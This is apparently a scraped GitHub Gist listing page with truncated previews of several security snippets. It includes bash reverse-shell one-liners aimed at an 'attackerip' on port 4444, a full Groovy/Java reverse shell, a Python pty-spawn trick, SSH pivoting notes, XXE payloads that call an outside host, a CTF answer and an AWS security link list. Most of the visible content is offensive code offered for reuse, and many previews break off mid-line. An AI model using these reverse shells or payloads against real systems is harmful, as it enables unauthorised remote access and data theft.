Skip to content

Instantly share code, notes, and snippets.

Author : Cyber Security IPB
Date : October 28, 2016
Dependencies : pwntools
Script ini bisa mengganti pemanggilan fungsi dari suatu binary ELF
(32 / 64 bit). Misalnya mengubah dari "call printf" menjadi call "puts"
untuk menambal celah format string exploit. Atau mengubah pemanggilan
fungsi yang ada di program menjadi fungsi lain.
View reverse_shells
bash -i >& /dev/tcp/ 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
waywardsun / ssh_tricks
Created Sep 20, 2016 — forked from sckalath/ssh_tricks
ssh kung fu
View ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on that lets you pivot through the remote host (
#Command line:
ssh -D
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from
waywardsun / tricks
Created Sep 20, 2016 — forked from sckalath/tricks
View tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
0xBADCA7 /
Created Aug 27, 2016
Async HTTP requests in Python
from concurrent.futures import ThreadPoolExecutor
from requests_futures.sessions import FuturesSession
def outp(response):
urls = [
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
View CTF_Solutions.txt
## Level 1:
View the source, at the top we see:
<!-- infosec_flagis_welcome -->
Level 1 PASS: infosec_flagis_welcome
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
chanj / AWS Security Resources
Last active Jun 21, 2021
AWS Security Resources
View AWS Security Resources
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link:
Official AWS Security Resources
* Security Blog -
* Security Advisories -
* Security Whitepaper (AWS Security Processes/Practices) -
* Security Best Practices Whitepaper -